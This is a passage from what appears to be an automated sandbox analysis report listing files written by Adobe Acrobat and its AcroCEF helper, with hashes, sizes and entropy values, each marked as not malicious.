MD5: | 022AE8A4E9A863F2310BEC16F523E486 |
SHA1: | 0B1B1A56C77F4B98924810BA7B040A0B5245B86C |
SHA-256: | 127F08DA8249778FCD2B28B61182D95437AC520876899B9B0ADB9ACCC480ED7B |
SHA-512: | 8BC50ECDB936A9EE036FD3764E45FF865512050821A62B05C890281F97D512F6F2E4BFBF248294246CBE8711D889712D4EA0B0384E29278BC4E4E96ED3CC63ED |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.156207652563672 |
Encrypted: | false |
SSDEEP: | 6:iO49W+q2Pwkn2nKuAl9OmbnIFUtS9gxZmws9gFVkwOwkn2nKuAl9OmbjLJ:7qvYfHAahFUtvx/Nr5JfHAaSJ |
MD5: | AD80D7058F78D49204CDC8C710E4DB7F |
SHA1: | CE92F39DC9A5CE5A69A23006159AC7BD6D4CB6FA |
SHA-256: | 3086B0F4BFEE5A30A15B03CE0584A98CB0B3B62BC9DEB0F5FAF1DD6742DF91AD |
SHA-512: | 28CF398EB2EC6DD66C32FFA530D7B8CF246105F1EAF90EBAC8EA410A599D82F4C179BEC9D4707D8642F14CFF2B6709FDADB6FBA9E07A39231FB51863F06B1A91 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.156207652563672 |
Encrypted: | false |
SSDEEP: | 6:iO49W+q2Pwkn2nKuAl9OmbnIFUtS9gxZmws9gFVkwOwkn2nKuAl9OmbjLJ:7qvYfHAahFUtvx/Nr5JfHAaSJ |
MD5: | AD80D7058F78D49204CDC8C710E4DB7F |
SHA1: | CE92F39DC9A5CE5A69A23006159AC7BD6D4CB6FA |
SHA-256: | 3086B0F4BFEE5A30A15B03CE0584A98CB0B3B62BC9DEB0F5FAF1DD6742DF91AD |
SHA-512: | 28CF398EB2EC6DD66C32FFA530D7B8CF246105F1EAF90EBAC8EA410A599D82F4C179BEC9D4707D8642F14CFF2B6709FDADB6FBA9E07A39231FB51863F06B1A91 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.193278576628195 |
Encrypted: | false |
SSDEEP: | 6:iO49rHSQ+q2Pwkn2nKuAl9Ombzo2jMGIFUtS96SgZmws9sQQVkwOwkn2nKuAl9OU:7uOvYfHAa8uFUt9/P5JfHAa8RJ |
MD5: | 57D752248829D06493FDE8ED0DBB568E |
SHA1: | 99985100D2465ABDDF1CCA0F47062F0C2AF20020 |
SHA-256: | 27C69EE229B0606DF09F2892E032BA6C6400B9BC2239085DE423E69715ADC28B |
SHA-512: | 54E3C9A64B3083051934079CC35052BED622B857E56B37A3DF232636A29572A9D1F60288E1B05BC3627F42BC3353B49BA1C12CE4E18013BA0D62AB02930DB1A9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.193278576628195 |
Encrypted: | false |
SSDEEP: | 6:iO49rHSQ+q2Pwkn2nKuAl9Ombzo2jMGIFUtS96SgZmws9sQQVkwOwkn2nKuAl9OU:7uOvYfHAa8uFUt9/P5JfHAa8RJ |
MD5: | 57D752248829D06493FDE8ED0DBB568E |
SHA1: | 99985100D2465ABDDF1CCA0F47062F0C2AF20020 |
SHA-256: | 27C69EE229B0606DF09F2892E032BA6C6400B9BC2239085DE423E69715ADC28B |
SHA-512: | 54E3C9A64B3083051934079CC35052BED622B857E56B37A3DF232636A29572A9D1F60288E1B05BC3627F42BC3353B49BA1C12CE4E18013BA0D62AB02930DB1A9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\57812e1f-048e-475d-94bb-f7af0b528f32.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.967403857886107 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sq9cyMhsBdOg2HJOcaq3QYiubInP7E4T3y:Y2sRdsuHMydMHX3QYhbG7nby |
MD5: | 6B150224B3A6C25084F5CD3F2FC65022 |
SHA1: | 1A4C3621ACA891F322958F75DFD8287C17C1D66C |
SHA-256: | D50F3D6E2FFF4E756629BE273B1746F3A3B2404D3A707FDEEA37C30453F836CE |
SHA-512: | 563CA7320A83310231515725A238CA2DC45FEA03F5D3C8846224B597763767A3D31FFDFE6FAEAE09667383E2FD0AEC0752C17941414896097E4E24D6C0BFF9BE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.967403857886107 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sq9cyMhsBdOg2HJOcaq3QYiubInP7E4T3y:Y2sRdsuHMydMHX3QYhbG7nby |
MD5: | 6B150224B3A6C25084F5CD3F2FC65022 |
SHA1: | 1A4C3621ACA891F322958F75DFD8287C17C1D66C |
SHA-256: | D50F3D6E2FFF4E756629BE273B1746F3A3B2404D3A707FDEEA37C30453F836CE |
SHA-512: | 563CA7320A83310231515725A238CA2DC45FEA03F5D3C8846224B597763767A3D31FFDFE6FAEAE09667383E2FD0AEC0752C17941414896097E4E24D6C0BFF9BE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4320 |
Entropy (8bit): | 5.256697452989148 |
Encrypted: | false |
SSDEEP: | 96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo76UOH4:etJCV4FiN/jTN/2r8Mta02fEhgO73goD |
MD5: | 9F4B77498257E2E250322C694FD8DF2C |
SHA1: | 644A87EA9A89DD4A08A862F8BD4CE7354F9DC558 |
SHA-256: | C040BD1920C599CE320586C367797293C759BCDABB5576139314C0936389B3B0 |
SHA-512: | BE8F6C36D39A91F45C998A0B6B75D3EA37963237831B49C05AFE49E641EAB34A4021AF5E275C702FBC3189247C8D85B5F509D6DDEDB6DCC15DD659F7CEDC70B8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.188181253994676 |
Encrypted: | false |
SSDEEP: | 6:iO491Q+q2Pwkn2nKuAl9OmbzNMxIFUtS9wygZmws9wyQVkwOwkn2nKuAl9OmbzNq:7avYfHAa8jFUtN/F5JfHAa84J |
MD5: | 725BE8375FA7AAF29E582BB04C499D6D |
SHA1: | 63F60D30AE3B0DA3E217F2845FBAD5ACD84D0E85 |
SHA-256: | E75FF8BBB1A16FDB304B4C1A8510804DD78343F2121FD477E5B692BB5E8B9437 |
SHA-512: | 6FE3CCB334BF76A5EEAB529BBD230E5E31B962A30F16024CE6C0DDF8F4A913D2EA043325EFE3541288345D96AEA7C697970CBD8A64144AD41E3D9886377E616A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.188181253994676 |
Encrypted: | false |
SSDEEP: | 6:iO491Q+q2Pwkn2nKuAl9OmbzNMxIFUtS9wygZmws9wyQVkwOwkn2nKuAl9OmbzNq:7avYfHAa8jFUtN/F5JfHAa84J |
MD5: | 725BE8375FA7AAF29E582BB04C499D6D |
SHA1: | 63F60D30AE3B0DA3E217F2845FBAD5ACD84D0E85 |
SHA-256: | E75FF8BBB1A16FDB304B4C1A8510804DD78343F2121FD477E5B692BB5E8B9437 |
SHA-512: | 6FE3CCB334BF76A5EEAB529BBD230E5E31B962A30F16024CE6C0DDF8F4A913D2EA043325EFE3541288345D96AEA7C697970CBD8A64144AD41E3D9886377E616A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.444812979028428 |
Encrypted: | false |
SSDEEP: | 384:Seeci5tAiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:KXs3OazzU89UTTgUL |
MD5: | F837D2ED80225514770DF2BA7E940868 |
SHA1: | F723074367CCE047D644A411416A48D6C881C47C |
SHA-256: | 965C8431FABC46ADBFC4A191D540DB6133D9AAD55F8DD29365E663C7297FF22E |
SHA-512: | DFA3B1AD05A3A7D7FA1D32D5DC5AADAC0EBFE3A13C6B39A1C9C3825A683E1F929B28C53938CFC1B84A66D196253F030C6022A511C6DE78D8F99B0930F3DD2FD6 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2128530206325516 |
Encrypted: | false |
SSDEEP: | 24:7+tJ9/c9nuwKIqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmv:7Mg9nCIqvmFTIF3XmHjBoGGR+jMz+Lhf |
MD5: | 1BE04A415A6C7CB9EE24861FEF8D11D9 |
SHA1: | E8E1DE72CD7823AF87FC36B7A99D44051B691D5D |
SHA-256: | 42A3538B4CBB7FE0C591688D6FDFAD6F2E62C363C57247C3EFAFF21B9E12DC64 |
SHA-512: | 68EBEAF67BAEE451CE3D311DE2FDEDC29714DBBC11A6EF914AC9E9379F478516F69AAA30ECEED2B599255B023B7CF246921A8CADE46B479CD008C3BB865F9C7C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.764745823915414 |
Encrypted: | false |
SSDEEP: | 3:kkFkl5rstfllXlE/HT8kspZNNX8RolJuRdxLlGB9lQRYwpDdt:kKAseT8XNMa8RdWBwRd |
MD5: | C0A9B63112CAB34A78D09BAE3441F79E |
SHA1: | F121604A24AC451762716308F4BA56BDBCA6B36D |
SHA-256: | 8D0F8F1EE8159A6CD024D60C83E99354B63D203EC120A8CB4BBB5F6DFEA03769 |
SHA-512: | 3AFE1670A4056724C7B0F2CF0BCA894F10CADFD1F6182C311A0E2B096744C1C8057C836D9436198F3C919206E03FB8B400CF08AA826053FD346C3A26318FCBE9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.374265560889318 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXb7EJiNHVoZcg1vRcR0YkU5EKoAvJM3g98kUwPeUkwRe9:YvXKXvDkZc0vGE5GMbLUkee9 |
MD5: | 93D2B1EB7855FB3765FBCEB6F84BC5D6 |
SHA1: | 8BF76782C650421D1D55237A87C77F132F9E36ED |
SHA-256: | F267F9ABE84154CA939BE3D0E1799444F7D3E13ACA0AB0B2D44099ECC7301519 |
SHA-512: | 004C344D65D28E1337F786EC0A631F068B0896FE79C48ABFCAAF02B0D2E240B951E43F3219850C2B9D8D09C44FFC6E70217BD20D947ED33FA3BC45E9769C936A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.324701778388956 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXb7EJiNHVoZcg1vRcR0YkU5EKoAvJfBoTfXpnrPeUkwRe9:YvXKXvDkZc0vGE5GWTfXcUkee9 |
MD5: | 75D2BB01C7DD7A13822DD26B1C0AAC91 |
SHA1: | 30B3FC675C1A8C707B7CDC5BB13039E8FA63B983 |
SHA-256: | 919279EC3F2CA54B2AD84466027CC1EA3EEBCAC0CDC39E2ACC3E2305BB820AF7 |
SHA-512: | 8EAD5ABBAB4E1BAF9334158AD7117A0B5D8195337F123DECAA97403768F22AB2E4485C8B9E6F02DEE77E8C319BBA53B9C1997FC0063DB13E67BCB005DB124F46 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.304188347526358 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXb7EJiNHVoZcg1vRcR0YkU5EKoAvJfBD2G6UpnrPeUkwRe9:YvXKXvDkZc0vGE5GR22cUkee9 |
MD5: | F91F16923D64A35DA0FB7818747F8D4F |
SHA1: | 8B734781E2DC6007D8780E2739AB8367C1885A86 |
SHA-256: | F8DB63A8D1913290253D2FA8965E5D4D704670D8F1AEBC4685676DB9E313A06D |
SHA-512: | 65B8B183C127E6C022FEF4B436A3C93D665F9E04C9FBD799A7A3AB2EEFA3456D983F869B043A3878C8989794103CB5C21E9277E1B99EA1EF596A2FD914230027 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.3616585995256045 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXb7EJiNHVoZcg1vRcR0YkU5EKoAvJfPmwrPeUkwRe9:YvXKXvDkZc0vGE5GH56Ukee9 |
MD5: | 68B70E39AF37C77952ABE375F568B042 |
SHA1: | 213E7B0EFF391D7484093425E16DEBF85258CE1F |
SHA-256: | AE6DC39DC9DE2B5972D99B81D87B2405E89930C0E53961BF38378E2650969F1D |
SHA-512: | 58A7209C6A87B1AEC8FA64ED1A250E4322012D91772EEA2C704AFA7A1EEA280417322803191B2799A97EAB63DE44C2D7F58C1551124FFFABECD4A64659EEF376 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.6846965301855645 |
Encrypted: | false |
SSDEEP: | 24:Yv6XvDkzvapLgE9cQx8LennAvzBvkn0RCmK8czOCCSR:YvOYihgy6SAFv5Ah8cv/R |
MD5: | 212450477030514CCD9DA32E2DF21E63 |
SHA1: | 9BF06FE7944EDC880565657507FDC014481F582B |
SHA-256: | 1144DE1113C5843E4248630FEC874F869A1BC38FCAB0827C0FE98363424139F1 |
SHA-512: | 4C5FAEC6D6E38787457864FAA7CE7A371E42BA6499660D439B67FA4EBC03417D5798E3E5BB96E7503A0021C0D2D089C0BBDBB2FE03135331926FFC2EE0191E83 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.3051429536640535 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXb7EJiNHVoZcg1vRcR0YkU5EKoAvJf8dPeUkwRe9:YvXKXvDkZc0vGE5GU8Ukee9 |
MD5: | D1E242DEB6C2FFE4A99DB8A49AB00D6D |
SHA1: | 29A7466EAFFEE82E39956747DED15832A15DE243 |
SHA-256: | 34748715875B2EAD93DEE4F6ACB444D2764761E2AB3D36DC515A18CB5E2F69A1 |
SHA-512: | DDA0007D3FA148E117B92000E60A31BAADF87BC1721ADC9CCDB4B0E644906D5FBDDEA43F0E95EDEA43DE13EC69F9285E58654066064FB75EECEC7538515EB8AA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.3092815501187225 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXb7EJiNHVoZcg1vRcR0YkU5EKoAvJfQ1rPeUkwRe9:YvXKXvDkZc0vGE5GY16Ukee9 |
MD5: | 15D4A2C3ACC4FDB96AD1F0212873D643 |
SHA1: | 2E76AFFDBF09773413F8AAB09C0412AE425E1341 |
SHA-256: | C4E119AE435D04D0B6114808EB71C6BB493210FC95E401E7ACFB480D40C809C1 |
SHA-512: | A972D807C219B3EA81C8DF94BC10B37C67E8C3FA5101887AC5D767ACC81CA462489AA8F96068DBC05E33D6126677F9538348B5A3EE9EC4A9027764BE700BF7B8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.3112130538936215 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXb7EJiNHVoZcg1vRcR0YkU5EKoAvJfFldPeUkwRe9:YvXKXvDkZc0vGE5Gz8Ukee9 |
MD5: | A69DC5074DFD3D16C36EA683F43FFB92 |
SHA1: | 4ED03194487248211DF75DB3DC5E6C9051E8A8DD |
SHA-256: | 928EC1D6B468C2A7B9E8F194BFCC84542A61FFD35F754E92C5BF33039F5DEAFB |
SHA-512: | 8F0072FDA39F4C9C6F97C785608A082DF663C752F157EF2AF4270041E48FA90DAA18930E2F7EE1BB79ACDA097D79EE3B5AB82F67B84334FEF37AD7384A7F015C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.329251279991386 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXb7EJiNHVoZcg1vRcR0YkU5EKoAvJfzdPeUkwRe9:YvXKXvDkZc0vGE5Gb8Ukee9 |
MD5: | 7FC13F0DB7FFCC6E12AF05D89CCC69C3 |
SHA1: | 59F90ABB504A8AADA455FE4D092474013B25EF3C |
SHA-256: | C906B76B59B48E2B6AA6045D673D03CCC8684051F905096995586F8C37156E66 |
SHA-512: | FB18D2A514DE414348B0DD385558C413CF311065401A105B42DF351C9BBBC3431BE40A54A8942A00FB9E7ECA9E10C2514AEC12C95F079FEB04DDB98081574CC5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.310377780409357 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXb7EJiNHVoZcg1vRcR0YkU5EKoAvJfYdPeUkwRe9:YvXKXvDkZc0vGE5Gg8Ukee9 |
MD5: | 82332DF3E8A1FD57B53FD072C8252B22 |
SHA1: | 586021F10C44305C51F0AB595FFE5B3EC7CB8546 |
SHA-256: | 543C93AA0FE237014B0F9EBFD5639A3055F4E161A20A46C2BA94C7FED70EEDB8 |
SHA-512: | 16C869CCD948E89BE73843AA306909CDE428CE995BE032BA7F954ECB30CBC2D73E59CA624103048DD30FF2ABB0AE4936E094B8E8964FC23D0BC4A9432DCF1C1B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.296909851561443 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXb7EJiNHVoZcg1vRcR0YkU5EKoAvJf+dPeUkwRe9:YvXKXvDkZc0vGE5G28Ukee9 |
MD5: | 92A47E4A93AE1D241DFF7A59FF55426F |
SHA1: | 36A925131A82A3D999166E0FC1DCC49DC46BCB4D |
SHA-256: | 783E3E3977D49DB2695D7B7D8A6748A7610A668B11DABE2A64FEE109E9684FDA |
SHA-512: | 5E659101FC11387DE211019A8A1CEBE6C54B64EFE6FB0F43713A2268D19E9658D31691CBDA01F313F92392F6726260204358E5F4760F9F8293A8DB4BE6072E59 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.293853553131951 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXb7EJiNHVoZcg1vRcR0YkU5EKoAvJfbPtdPeUkwRe9:YvXKXvDkZc0vGE5GDV8Ukee9 |
MD5: | 7BAF1C5949110F9102254CA82C7BB993 |
SHA1: | C149C818C862F9CB16D960E9719749C9CAC8C744 |
SHA-256: | 16129FC9BB83404216AE3DD4A4BDB5C14836B367B1163B375FA0A9C0945889B6 |
SHA-512: | D13E02167FFB5D5B35E44E5F9F0293B7906864A6E863A3A532C644C4F3F191F3869C6EBCA90FA686922EF54A3F35B07122DBB80EE7D4BADC267CB85673B3D3B8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.29894451533362 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXb7EJiNHVoZcg1vRcR0YkU5EKoAvJf21rPeUkwRe9:YvXKXvDkZc0vGE5G+16Ukee9 |
MD5: | DA8244F56F46FCBA2AFFB58E0177C6A1 |
SHA1: | 9235BF0C690ED881EABD003F035CCEB4C733C2AD |
SHA-256: | B1D24134D2CF6CE7A438AEDEE5A24B0791BF580600338B14E5140ECCDBBD17BA |
SHA-512: | D99267C16CD823599388EDC90A56C20B78EA839917E91AAEB52384ABDEB015063975DC9B1500EE3BCA306FB22976EDD8C6D1B411B419F4DB9928CD03280978D9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
